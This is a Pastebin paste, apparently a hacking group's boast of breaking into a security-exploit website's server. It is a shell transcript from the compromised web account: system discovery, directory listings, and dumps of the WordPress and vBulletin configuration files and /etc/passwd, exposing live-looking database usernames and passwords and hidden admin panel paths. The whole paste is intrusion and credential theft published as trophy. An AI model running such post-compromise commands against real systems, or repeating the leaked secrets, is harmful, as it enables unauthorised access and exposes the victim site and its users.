Advertisement
Guest User

Untitled

a guest
Dec 25th, 2010
1,996
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 53.24 KB | None | 0 0
  1. Attack on Exploit-db From 1337 Team
  2.  
  3. . .--. .--. .---. .
  4. .'| ) ) / |
  5. | --: --: / .-.| .-. . .
  6. | ) ) / ( |( ) | |
  7. '---' `--' `--' ' `-'`-`-'`-`--|
  8. ;
  9. `-'
  10. ================================================
  11.  
  12.  
  13. $ uname -a
  14. Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux
  15.  
  16. $ id
  17. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  18.  
  19. $ pwd
  20. /var/www
  21.  
  22. $ ls -la
  23. total 24180
  24. drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 .
  25. drwxr-xr-x 19 root root 4096 Sep 24 09:26 ..
  26. -rw-r--r-- 1 www-data www-data 1005 Nov 12 19:03 .htaccess
  27. -rw-r--r-- 1 www-data www-data 764 Nov 5 17:32 .htaccess.save
  28. -rw-r--r-- 1 www-data www-data 2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png
  29. drwxr-xr-x 4 www-data www-data 4096 Nov 11 07:43 92384723987239847239847234982734
  30. -rw-r--r-- 1 www-data www-data 46149 Nov 11 17:04 apc123456.php
  31. -rw-r--r-- 1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2
  32. -rw-r--r-- 1 www-data www-data 18851 Jul 9 14:42 disclosure.html
  33. -rw-r--r-- 1 www-data www-data 11662 Nov 11 11:42 dorkorinos.txt
  34. drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 edbpartners
  35. -rw-r--r-- 1 www-data www-data 1406 Jul 9 14:53 favicon.ico
  36. -rw-r--r-- 1 www-data www-data 1921 Jul 9 14:42 feature.txt
  37. -rw-r--r-- 1 www-data www-data 1923 Jul 11 16:01 feature1.txt
  38. drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 forums
  39. drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:41 funny404
  40. -rw-r--r-- 1 www-data www-data 1119 Nov 22 07:45 gd_rss.php
  41. -rw-r--r-- 1 www-data www-data 65 Aug 26 04:53 goaway.php
  42. -rw-r--r-- 1 www-data www-data 53 Jul 9 14:42 googled6c4817aa45e0032.html
  43. -rw-r--r-- 1 www-data www-data 5 Nov 11 07:24 hola.txt
  44. -rw-r--r-- 1 www-data www-data 3154634 Nov 11 07:25 hola.xml
  45. drwxr-xr-x 15 www-data www-data 4096 Nov 22 15:50 images
  46. -rw-r--r-- 1 www-data www-data 397 Aug 26 04:53 index.php
  47. drwxr-xr-x 2 www-data www-data 4096 Nov 4 12:20 leetdownloads
  48. -rw-r--r-- 1 www-data www-data 311 Nov 12 18:40 maintenance.php
  49. drwxr-xr-x 2 root root 4096 Nov 26 10:18 movies
  50. -rw-r--r-- 1 www-data www-data 106 Aug 26 04:53 news.php
  51. drwxr-xr-x 2 www-data www-data 4096 Nov 11 17:20 nginx-default
  52. -rw-r--r-- 1 www-data www-data 220 Oct 30 17:00 pagerank.html
  53. -rw-r--r-- 1 www-data www-data 761 Sep 6 06:12 rating.txt
  54. -rw-r--r-- 1 www-data www-data 9122 Aug 18 05:32 readme.html
  55. -rw-r--r-- 1 www-data www-data 47 Jul 9 14:53 robots_ssl.txt
  56. -rw-r--r-- 1 www-data www-data 4007150 Dec 1 07:47 ror.xml
  57. -rw-r--r-- 1 www-data www-data 2102 Sep 1 05:40 rss.php
  58. drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 scripts
  59. -rw-r--r-- 1 www-data www-data 1056 Sep 3 18:05 search-mobile.php
  60. -rw-r--r-- 1 www-data www-data 108 Aug 26 04:53 search.php
  61. -rw-r--r-- 1 www-data www-data 3337393 Dec 1 07:47 sitemap.xml
  62. -rw-r--r-- 1 www-data www-data 3462 Aug 19 11:37 sitemap.xsl
  63. -rw-r--r-- 1 www-data www-data 30533 Nov 30 17:52 sitemap_blog.xml
  64. -rw-r--r-- 1 www-data www-data 4229 Nov 30 17:52 sitemap_blog.xml.gz
  65. drwxr-xr-x 3 www-data www-data 4096 Jul 9 14:42 slider
  66. drwxr-xr-x 2 www-data www-data 20480 Dec 4 09:18 sploits
  67. -rw-r--r-- 1 www-data www-data 9621 Nov 3 19:52 style.css
  68. drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:40 testme
  69. -rw-r--r-- 1 www-data www-data 5699 Nov 4 07:22 tpl_search.php
  70. -rw-r--r-- 1 www-data www-data 16 Nov 28 06:52 update-982374.txt
  71. -rw-r--r-- 1 www-data www-data 50 Aug 26 04:53 updated.php
  72. drwxr-xr-x 3 www-data www-data 4096 Aug 3 09:35 videos
  73. -rw-r--r-- 1 www-data www-data 4391 Aug 26 04:53 wp-activate.php
  74. drwxr-xr-x 8 www-data www-data 4096 Nov 11 17:59 wp-admin
  75. -rw-r--r-- 1 www-data www-data 40284 Aug 26 04:53 wp-app.php
  76. -rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-atom.php
  77. -rw-r--r-- 1 www-data www-data 274 Aug 26 04:53 wp-blog-header.php
  78. -rw-r--r-- 1 www-data www-data 3926 Aug 26 04:53 wp-comments-post.php
  79. -rw-r--r-- 1 www-data www-data 238 Aug 26 04:53 wp-commentsrss2.php
  80. -rw-r--r-- 1 www-data www-data 3173 Aug 26 04:53 wp-config-sample.php
  81. -rw-r--r-- 1 www-data www-data 2832 Nov 11 17:59 wp-config.php
  82. drwxr-xr-x 8 www-data www-data 4096 Dec 3 22:49 wp-content
  83. -rw-r--r-- 1 www-data www-data 1255 Aug 26 04:53 wp-cron.php
  84. -rw-r--r-- 1 www-data www-data 240 Aug 26 04:53 wp-feed.php
  85. drwxr-xr-x 7 www-data www-data 4096 Sep 8 13:52 wp-includes
  86. -rw-r--r-- 1 www-data www-data 2002 Aug 26 04:53 wp-links-opml.php
  87. -rw-r--r-- 1 www-data www-data 2441 Aug 26 04:53 wp-load.php
  88. -rw-r--r-- 1 www-data www-data 26160 Sep 3 21:48 wp-login.php
  89. -rw-r--r-- 1 www-data www-data 7774 Aug 26 04:53 wp-mail.php
  90. -rw-r--r-- 1 www-data www-data 487 Aug 26 04:53 wp-pass.php
  91. -rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rdf.php
  92. -rw-r--r-- 1 www-data www-data 316 Aug 26 04:53 wp-register.php
  93. -rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rss.php
  94. -rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-rss2.php
  95. -rw-r--r-- 1 www-data www-data 9177 Sep 8 13:01 wp-settings.php
  96. -rw-r--r-- 1 www-data www-data 18695 Aug 26 04:53 wp-signup.php
  97. -rw-r--r-- 1 www-data www-data 3702 Aug 26 04:53 wp-trackback.php
  98. -rw-r--r-- 1 www-data www-data 93955 Aug 26 04:53 xmlrpc-orig.php
  99. -rw-r--r-- 1 www-data www-data 94184 Aug 26 04:53 xmlrpc.php
  100.  
  101.  
  102. $ cat wp-config.php
  103. <?php
  104. /**
  105. * The base configurations of the WordPress.
  106. *
  107. * This file has the following configurations: MySQL settings, Table Prefix,
  108. * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
  109. * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  110. * wp-config.php} Codex page. You can get the MySQL settings from your web host.
  111. *
  112. * This file is used by the wp-config.php creation script during the
  113. * installation. You don't have to use the web site, you can just copy this file
  114. * to "wp-config.php" and fill in the values.
  115. *
  116. * @package WordPress
  117. */
  118.  
  119. // ** MySQL settings - You can get this info from your web host ** //
  120. /** The name of the database for WordPress */
  121. //define('DB_NAME', 'explot2');
  122. define('WP_CACHE', true); //Added by WP-Cache Manager
  123. define('DB_NAME', 'edb_new');
  124.  
  125. /** MySQL database username */
  126. define('DB_USER', 'edbuser');
  127.  
  128. /** MySQL database password */
  129. //define('DB_PASSWORD', 'admin123');
  130. define('DB_PASSWORD', '2834729347928372342');
  131. //define('DB_PASSWORD', 'f00b204e98009d22b68e54a');
  132.  
  133. /** MySQL hostname */
  134. define('DB_HOST', 'localhost');
  135. define('WP_MEMORY_LIMIT', '1024M');
  136. /** Database Charset to use in creating database tables. */
  137. define('DB_CHARSET', 'utf8');
  138.  
  139. /** The Database Collate type. Don't change this if in doubt. */
  140. define('DB_COLLATE', '');
  141. define('FORCE_SSL_LOGIN', true);
  142.  
  143. /**#@+
  144. * Authentication Unique Keys.
  145. *
  146. * Change these to different unique phrases!
  147. * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-k
  148. * You can change these at any point in time to invalidate all existing cookies. This will force all users
  149. in again.
  150. *
  151. * @since 2.6.0
  152. */
  153. define('AUTH_KEY', 'put your unique phrase here');
  154. define('SECURE_AUTH_KEY', 'put your unique phrase here');
  155. define('LOGGED_IN_KEY', 'put your unique phrase here');
  156. define('NONCE_KEY', 'put your unique phrase here');
  157. /**#@-*/
  158.  
  159. /**
  160. * WordPress Database Table prefix.
  161. *
  162. * You can have multiple installations in one database if you give each a unique
  163. * prefix. Only numbers, letters, and underscores please!
  164. */
  165. $table_prefix = 'wp_';
  166.  
  167. /**
  168. * WordPress Localized Language, defaults to English.
  169. *
  170. * Change this to localize WordPress. A corresponding MO file for the chosen
  171. * language must be installed to wp-content/languages. For example, install
  172. * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
  173. * language support.
  174. */
  175. define ('WPLANG', '');
  176.  
  177. /* That's all, stop editing! Happy blogging. */
  178.  
  179. /** Absolute path to the WordPress directory. */
  180. if ( !defined('ABSPATH') )
  181. define('ABSPATH', dirname(__FILE__) . '/');
  182.  
  183. /** Sets up WordPress vars and included files. */
  184. require_once(ABSPATH . 'wp-settings.php');
  185.  
  186. define('WP_DEBUG',true);
  187. define('WP_MEMORY_LIMIT', '128M');
  188.  
  189. $ cd forums
  190.  
  191. $ ls -la
  192. total 2344
  193. drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 .
  194. drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 ..
  195. -rw-r--r-- 1 www-data www-data 1008 Nov 6 12:03 .htaccess
  196. -rw-rw-r-- 1 www-data www-data 17862 Nov 22 20:01 LICENSE
  197. drwxr-xr-x 3 www-data www-data 4096 Nov 22 20:04 admincp
  198. drwxr-xr-x 3 www-data www-data 4096 Nov 22 20:04 admincp-23987239874298273987234
  199. -rwxr-xr-x 1 www-data www-data 40193 Nov 22 20:01 ajax.php
  200. -rwxr-xr-x 1 www-data www-data 75603 Nov 22 20:01 album.php
  201. -rwxr-xr-x 1 www-data www-data 19119 Nov 22 20:01 announcement.php
  202. drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 archive
  203. -rwxr-xr-x 1 www-data www-data 9040 Nov 22 20:01 asset.php
  204. -rwxr-xr-x 1 www-data www-data 21161 Nov 22 20:01 assetmanage.php
  205. -rwxr-xr-x 1 www-data www-data 15788 Nov 22 20:01 attachment.php
  206. -rwxr-xr-x 1 www-data www-data 6935 Nov 22 20:01 attachment_inlinemod.php
  207. -rwxr-xr-x 1 www-data www-data 3616 Nov 22 20:01 blog_attachment.php
  208. -rwxr-xr-x 1 www-data www-data 96121 Nov 22 20:01 calendar.php
  209. -rwxr-xr-x 1 www-data www-data 43 Nov 22 20:01 clear.gif
  210. drwxr-xr-x 9 www-data www-data 4096 Nov 6 11:22 clientscript
  211. -rwxr-xr-x 1 www-data www-data 15786 Nov 22 20:01 converse.php
  212. drwxr-xr-x 7 www-data www-data 4096 Nov 6 11:22 cpstyles
  213. -rwxr-xr-x 1 www-data www-data 3309 Nov 22 20:01 cron.php
  214. -rwxr-xr-x 1 www-data www-data 6145 Nov 22 20:01 css.php
  215. drwxr-xr-x 3 www-data www-data 4096 Nov 6 11:22 customavatars
  216. drwxr-xr-x 3 www-data www-data 4096 Nov 6 11:22 customgroupicons
  217. drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 customprofilepics
  218. -rwxr-xr-x 1 www-data www-data 1823 Nov 22 20:01 editor.php
  219. -rwxr-xr-x 1 www-data www-data 47010 Nov 22 20:01 editpost.php
  220. -rwxr-xr-x 1 www-data www-data 1427 Nov 22 20:01 entry.php
  221. -rwxr-xr-x 1 www-data www-data 30084 Nov 22 20:01 external.php
  222. -rwxr-xr-x 1 www-data www-data 9966 Nov 22 20:01 faq.php
  223. -rwxr-xr-x 1 www-data www-data 10134 Nov 22 20:01 favicon.ico
  224. -rwxr-xr-x 1 www-data www-data 23332 Nov 22 20:01 forum.php
  225. -rwxr-xr-x 1 www-data www-data 42452 Nov 22 20:01 forumdisplay.php
  226. -rwxr-xr-x 1 www-data www-data 2066 Nov 22 20:01 global.php
  227. -rwxr-xr-x 1 www-data www-data 155838 Nov 22 20:01 group.php
  228. -rwxr-xr-x 1 www-data www-data 26150 Nov 22 20:01 group_inlinemod.php
  229. -rwxr-xr-x 1 www-data www-data 11883 Nov 22 20:01 groupsubscription.php
  230. -rwxr-xr-x 1 www-data www-data 9039 Nov 22 20:01 image.php
  231. drwxr-xr-x 24 www-data www-data 4096 Nov 6 13:16 images
  232. drwxr-xr-x 8 www-data www-data 12288 Nov 6 14:29 includes
  233. -rwxr-xr-x 1 www-data www-data 2396 Nov 22 20:01 index.php
  234. -rwxr-xr-x 1 www-data www-data 47021 Nov 22 20:01 infraction.php
  235. -rwxr-xr-x 1 www-data www-data 187803 Nov 22 20:01 inlinemod.php
  236. -rwxr-xr-x 1 www-data www-data 11440 Nov 22 20:01 joinrequests.php
  237. -rwxr-xr-x 1 www-data www-data 1757 Nov 22 20:01 list.php
  238. -rwxr-xr-x 1 www-data www-data 10947 Nov 22 20:01 login.php
  239. -rwxr-xr-x 1 www-data www-data 30244 Nov 22 20:01 member.php
  240. -rwxr-xr-x 1 www-data www-data 16392 Nov 22 20:01 member_inlinemod.php
  241. -rwxr-xr-x 1 www-data www-data 40345 Nov 22 20:01 memberlist.php
  242. -rwxr-xr-x 1 www-data www-data 22264 Nov 22 20:01 misc.php
  243. drwxr-xr-x 2 www-data www-data 4096 Nov 22 20:01 modcp
  244. drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:55 modcp-23987239874298273987234
  245. -rwxr-xr-x 1 www-data www-data 76827 Nov 22 20:01 moderation.php
  246. -rwxr-xr-x 1 www-data www-data 6779 Nov 22 20:01 moderator.php
  247. -rwxr-xr-x 1 www-data www-data 17552 Nov 22 20:01 newattachment.php
  248. -rwxr-xr-x 1 www-data www-data 41079 Nov 22 20:01 newreply.php
  249. -rwxr-xr-x 1 www-data www-data 20185 Nov 22 20:01 newthread.php
  250. -rwxr-xr-x 1 www-data www-data 21802 Nov 22 20:01 online.php
  251. drwxr-xr-x 5 www-data www-data 4096 Nov 6 11:22 packages
  252. -rwxr-xr-x 1 www-data www-data 8096 Nov 22 20:01 payment_gateway.php
  253. -rwxr-xr-x 1 www-data www-data 13360 Nov 22 20:01 payments.php
  254. -rwxr-xr-x 1 www-data www-data 4156 Nov 22 20:01 picture.php
  255. -rwxr-xr-x 1 www-data www-data 16665 Nov 22 20:01 picture_inlinemod.php
  256. -rwxr-xr-x 1 www-data www-data 26169 Nov 22 20:01 picturecomment.php
  257. -rwxr-xr-x 1 www-data www-data 29338 Nov 22 20:01 poll.php
  258. -rwxr-xr-x 1 www-data www-data 10414 Nov 22 20:01 posthistory.php
  259. -rwxr-xr-x 1 www-data www-data 76585 Nov 22 20:01 postings.php
  260. -rwxr-xr-x 1 www-data www-data 7087 Nov 22 20:01 printthread.php
  261. -rwxr-xr-x 1 www-data www-data 79435 Nov 22 20:01 private.php
  262. -rwxr-xr-x 1 www-data www-data 163695 Nov 22 20:01 profile.php
  263. -rwxr-xr-x 1 www-data www-data 56363 Nov 22 20:01 register.php
  264. -rwxr-xr-x 1 www-data www-data 7294 Nov 22 20:01 report.php
  265. -rwxr-xr-x 1 www-data www-data 14765 Nov 22 20:01 reputation.php
  266. -rwxr-xr-x 1 www-data www-data 35793 Nov 22 20:01 search.php
  267. -rwxr-xr-x 1 www-data www-data 22710 Nov 22 20:01 sendmessage.php
  268. -rwxr-xr-x 1 www-data www-data 12485 Nov 22 20:01 showgroups.php
  269. -rwxr-xr-x 1 www-data www-data 12738 Nov 22 20:01 showpost.php
  270. -rwxr-xr-x 1 www-data www-data 80115 Nov 22 20:01 showthread.php
  271. drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 signaturepics
  272. drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 store_sitemap
  273. -rwxr-xr-x 1 www-data www-data 38862 Nov 22 20:01 subscription.php
  274. -rwxr-xr-x 1 www-data www-data 5399 Nov 22 20:01 tags.php
  275. -rwxr-xr-x 1 www-data www-data 8800 Nov 22 20:01 threadrate.php
  276. -rwxr-xr-x 1 www-data www-data 11146 Nov 22 20:01 threadtag.php
  277. -rwxr-xr-x 1 www-data www-data 61 Nov 22 20:01 uploadprogress.gif
  278. -rwxr-xr-x 1 www-data www-data 39717 Nov 22 20:01 usercp.php
  279. -rwxr-xr-x 1 www-data www-data 21034 Nov 22 20:01 usernote.php
  280. drwxr-xr-x 13 www-data www-data 4096 Nov 6 11:22 vb
  281. drwxr-xr-x 8 www-data www-data 4096 Nov 6 12:23 vboptimise
  282. -rw-r--r-- 1 www-data www-data 2324 Nov 6 12:23 vboptimise.php
  283. drwxr-xr-x 4 www-data www-data 4096 Nov 6 11:55 vbseo
  284. -rw-r--r-- 1 www-data www-data 45286 Nov 6 11:55 vbseo.php
  285. drwxr-xr-x 4 www-data www-data 4096 Nov 6 14:29 vbseo_sitemap
  286. -rw-r--r-- 1 www-data www-data 4335 Nov 6 11:55 vbseocp.php
  287. -rwxr-xr-x 1 www-data www-data 27879 Nov 22 20:01 visitormessage.php
  288. -rwxr-xr-x 1 www-data www-data 1761 Nov 22 20:01 widget.php
  289. -rwxr-xr-x 1 www-data www-data 3952 Nov 22 20:01 xmlsitemap.php
  290.  
  291. $ cat includes/config.php
  292. <?php
  293. /*======================================================================*\
  294. || #################################################################### ||
  295. || # vBulletin 4.0.8
  296. || # ---------------------------------------------------------------- # ||
  297. || # All PHP code in this file is i??2000-2010 vBulletin Solutions Inc. # ||
  298. || # This file may not be redistributed in whole or significant part. # ||
  299. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  300. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  301. || #################################################################### ||
  302. \*======================================================================*/
  303.  
  304. /*-------------------------------------------------------*\
  305. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  306. +---------------------------------------------------------+
  307. | If you get any errors while attempting to connect to |
  308. | MySQL, you will need to email your webhost because we |
  309. | cannot tell you the correct values for the variables |
  310. | in this file. |
  311. \*-------------------------------------------------------*/
  312.  
  313. // ****** DATABASE TYPE ******
  314. // This is the type of the database server on which your vBulletin database will be located.
  315. // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP
  316. 5 and MySQL 4.1+
  317. // for slave options just append _slave to your preferred database type.
  318. $config['Database']['dbtype'] = 'mysql';
  319.  
  320. // ****** DATABASE NAME ******
  321. // This is the name of the database where your vBulletin will be located.
  322. // This must be created by your webhost.
  323. $config['Database']['dbname'] = 'edbforum';
  324.  
  325. // ****** TABLE PREFIX ******
  326. // Prefix that your vBulletin tables have in the database.
  327. $config['Database']['tableprefix'] = '';
  328.  
  329. // ****** TECHNICAL EMAIL ADDRESS ******
  330. // If any database errors occur, they will be emailed to the address specified here.
  331. // Leave this blank to not send any emails when there is a database error.
  332. $config['Database']['technicalemail'] = 'dbmaster@example.com';
  333.  
  334. // ****** FORCE EMPTY SQL MODE ******
  335. // New versions of MySQL (4.1+) have introduced some behaviors that are
  336. // incompatible with vBulletin. Setting this value to "true" disables those
  337. // behaviors. You only need to modify this value if vBulletin recommends it.
  338. $config['Database']['force_sql_mode'] = false;
  339.  
  340.  
  341.  
  342. // ****** MASTER DATABASE SERVER NAME AND PORT ******
  343. // This is the hostname or IP address and port of the database server.
  344. // If you are unsure of what to put here, leave the default values.
  345. //
  346. // Note: If you are using IIS 7+ and MySQL is on the same machine, you
  347. // need to use 127.0.0.1 instead of localhost
  348. $config['MasterServer']['servername'] = 'localhost';
  349. $config['MasterServer']['port'] = 3306;
  350.  
  351. // ****** MASTER DATABASE USERNAME & PASSWORD ******
  352. // This is the username and password you use to access MySQL.
  353. // These must be obtained through your webhost.
  354. $config['MasterServer']['username'] = 'forums';
  355. $config['MasterServer']['password'] = '2834725234523472342';
  356.  
  357. // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  358. // This option allows you to turn persistent connections to MySQL on or off.
  359. // The difference in performance is negligible for all but the largest boards.
  360. // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  361. $config['MasterServer']['usepconnect'] = 0;
  362.  
  363.  
  364.  
  365. // ****** SLAVE DATABASE CONFIGURATION ******
  366. // If you have multiple database backends, this is the information for your slave
  367. // server. If you are not 100% sure you need to fill in this information,
  368. // do not change any of the values here.
  369. $config['SlaveServer']['servername'] = '';
  370. $config['SlaveServer']['port'] = 3306;
  371. $config['SlaveServer']['username'] = '';
  372. $config['SlaveServer']['password'] = '';
  373. $config['SlaveServer']['usepconnect'] = 0;
  374.  
  375.  
  376.  
  377. // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  378. // This setting allows you to change the name of the folders that the admin and
  379. // moderator control panels reside in. You may wish to do this for security purposes.
  380. // Please note that if you change the name of the directory here, you will still need
  381. // to manually change the name of the directory on the server.
  382. $config['Misc']['admincpdir'] = 'admincp-23987239874298273987234';
  383. $config['Misc']['modcpdir'] = 'modcp-23987239874298273987234';
  384.  
  385. // Prefix that all vBulletin cookies will have
  386. // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  387. $config['Misc']['cookieprefix'] = 'bb';
  388.  
  389. // ******** FULL PATH TO FORUMS DIRECTORY ******
  390. // On a few systems it may be necessary to input the full path to your forums directory
  391. // for vBulletin to function normally. You can ignore this setting unless vBulletin
  392. // tells you to fill this in. Do not include a trailing slash!
  393. // Example Unix:
  394. // $config['Misc']['forumpath'] = '/home/users/public_html/forums';
  395. // Example Win32:
  396. // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  397. $config['Misc']['forumpath'] = '';
  398.  
  399.  
  400.  
  401. // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  402. // The users specified here will be allowed to view the admin log in the control panel.
  403. // Users must be specified by *ID number* here. To obtain a user's ID number,
  404. // view their profile via the control panel. If this is a new installation, leave
  405. // the first user created will have a user ID of 1. Seperate each userid with a comma.
  406. $config['SpecialUsers']['canviewadminlog'] = '1';
  407.  
  408. // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  409. // The users specified here will be allowed to remove ("prune") entries from the admin
  410. // log. See the above entry for more information on the format.
  411. $config['SpecialUsers']['canpruneadminlog'] = '1';
  412.  
  413. // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  414. // The users specified here will be allowed to run queries from the control panel.
  415. // See the above entries for more information on the format.
  416. // Please note that the ability to run queries is quite powerful. You may wish
  417. // to remove all user IDs from this list for security reasons.
  418. $config['SpecialUsers']['canrunqueries'] = '';
  419.  
  420. // ****** UNDELETABLE / UNALTERABLE USERS ******
  421. // The users specified here will not be deletable or alterable from the control panel by any users.
  422. // To specify more than one user, separate userids with commas.
  423. $config['SpecialUsers']['undeletableusers'] = '';
  424.  
  425. // ****** SUPER ADMINISTRATORS ******
  426. // The users specified below will have permission to access the administrator permissions
  427. // page, which controls the permissions of other administrators
  428. $config['SpecialUsers']['superadministrators'] = '1';
  429.  
  430. // ****** DATASTORE CACHE CONFIGURATION *****
  431. // Here you can configure different methods for caching datastore items.
  432. // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
  433. // vB_Datastore_APC - to use APC
  434. // vB_Datastore_XCache - to use XCache
  435. // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  436. // $config['Datastore']['class'] = 'vB_Datastore_Filecache';
  437.  
  438. // ******** DATASTORE PREFIX ******
  439. // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  440. // than one set of forums installed on your host, you *may* need to use a prefix
  441. // so that they do not try to use the same variable within the cache.
  442. // This works in a similar manner to the database table prefix.
  443. // $config['Datastore']['prefix'] = '';
  444.  
  445. // It is also necessary to specify the hostname or IP address and the port the server is listening on
  446. /*
  447. $config['Datastore']['class'] = 'vB_Datastore_Memcached';
  448. $i = 0;
  449. // First Server
  450. $i++;
  451. $config['Misc']['memcacheserver'][$i] = '127.0.0.1';
  452. $config['Misc']['memcacheport'][$i] = 11211;
  453. $config['Misc']['memcachepersistent'][$i] = true;
  454. $config['Misc']['memcacheweight'][$i] = 1;
  455. $config['Misc']['memcachetimeout'][$i] = 1;
  456. $config['Misc']['memcacheretry_interval'][$i] = 15;
  457. */
  458.  
  459. // ****** The following options are only needed in special cases ******
  460.  
  461. // ****** MySQLI OPTIONS *****
  462. // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  463. // If you need to set the default connection charset because your database
  464. // is using a charset other than latin1, you can set the charset here.
  465. // If you don't set the charset to be the same as your database, you
  466. // may receive collation errors. Ignore this setting unless you
  467. // are sure you need to use it.
  468. // $config['Mysqli']['charset'] = 'utf8';
  469.  
  470. // Optionally, PHP can be instructed to set connection parameters by reading from the
  471. // file named in 'ini_file'. Please use a full path to the file.
  472. // Example:
  473. // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  474. $config['Mysqli']['ini_file'] = '';
  475.  
  476. // Image Processing Options
  477. // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger image
  478. s, alter these settings.
  479. $config['Misc']['maxwidth'] = 2592;
  480. $config['Misc']['maxheight'] = 1944;
  481.  
  482. /*======================================================================*\
  483. || ####################################################################
  484. || # Downloaded: 10:22, Sat Nov 6th 2010
  485. || # CVS: $RCSfile$ - $Revision: 39199 $
  486. || ####################################################################
  487. \*======================================================================*/
  488.  
  489. $ cd /
  490.  
  491. $ ls -la
  492. total 112
  493. drwxr-xr-x 26 root root 4096 Nov 30 06:53 .
  494. drwxr-xr-x 26 root root 4096 Nov 30 06:53 ..
  495. drw------- 2 root root 4096 Dec 4 03:45 backup
  496. drw------- 2 root root 4096 Sep 1 07:38 backup-fix
  497. drwxr-xr-x 2 root root 4096 Oct 11 09:00 bin
  498. drwxr-xr-x 3 root root 4096 Nov 30 06:53 boot
  499. drwxr-xr-x 3 root root 4096 Nov 11 16:56 build
  500. drwxr-xr-x 2 root root 4096 Jul 9 05:29 cdrom
  501. drwxr-xr-x 14 root root 3800 Nov 30 06:53 dev
  502. drwxr-xr-x 91 root root 4096 Dec 2 06:34 etc
  503. drwxr-xr-x 3 root root 4096 Aug 3 11:48 home
  504. lrwxrwxrwx 1 root root 32 Nov 30 06:53 initrd.img -> boot/initrd.img-2.6.32-26-server
  505. lrwxrwxrwx 1 root root 32 Oct 4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server
  506. drwxr-xr-x 13 root root 12288 Nov 18 06:54 lib
  507. lrwxrwxrwx 1 root root 4 Jul 9 05:28 lib64 -> /lib
  508. drwx------ 2 root root 16384 Jul 9 05:28 lost+found
  509. drwxr-xr-x 2 root root 4096 Jul 9 15:17 maint
  510. drwxr-xr-x 3 root root 4096 Jul 9 05:28 media
  511. drwxr-xr-x 4 root root 4096 Jul 9 20:03 mnt
  512. drwxr-xr-x 3 root root 4096 Oct 7 16:53 opt
  513. dr-xr-xr-x 227 root root 0 Nov 11 10:45 proc
  514. drwx------ 9 root root 4096 Nov 25 09:08 root
  515. drwxr-xr-x 2 root root 4096 Oct 29 19:00 sbin
  516. drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
  517. drwxr-xr-x 2 root root 4096 Jul 9 05:28 srv
  518. drwxr-xr-x 13 root root 0 Nov 11 10:45 sys
  519. drwxrwxrwt 3 root root 4096 Dec 4 14:59 tmp
  520. drwxr-xr-x 10 root root 4096 Jul 9 05:28 usr
  521. drwxr-xr-x 19 root root 4096 Sep 24 09:26 var
  522. lrwxrwxrwx 1 root root 29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server
  523. lrwxrwxrwx 1 root root 29 Oct 4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server
  524.  
  525. $ cat /etc/passwd
  526. root:x:0:0:root:/root:/bin/bash
  527. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  528. bin:x:2:2:bin:/bin:/bin/sh
  529. sys:x:3:3:sys:/dev:/bin/sh
  530. sync:x:4:65534:sync:/bin:/bin/sync
  531. games:x:5:60:games:/usr/games:/bin/sh
  532. man:x:6:12:man:/var/cache/man:/bin/sh
  533. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  534. mail:x:8:8:mail:/var/mail:/bin/sh
  535. news:x:9:9:news:/var/spool/news:/bin/sh
  536. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  537. proxy:x:13:13:proxy:/bin:/bin/sh
  538. www-data:x:33:33:www-data:/var/www:/bin/sh
  539. backup:x:34:34:backup:/var/backups:/bin/sh
  540. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  541. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  542. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  543. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  544. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
